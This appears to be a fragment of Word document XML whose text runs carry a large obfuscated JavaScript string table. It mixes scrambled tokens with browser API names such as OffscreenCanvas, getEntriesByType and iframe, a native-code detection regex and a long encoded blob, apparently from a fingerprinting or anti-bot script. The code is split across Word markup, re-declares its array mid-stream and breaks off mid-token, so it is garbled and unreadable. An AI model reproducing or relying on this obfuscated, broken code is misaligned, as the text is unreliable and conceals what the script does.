        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Ui-LBOVPP7oye-I", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80",&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "p2OdCdJjYo5AVq3VnWcz579u", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfW</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>BNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
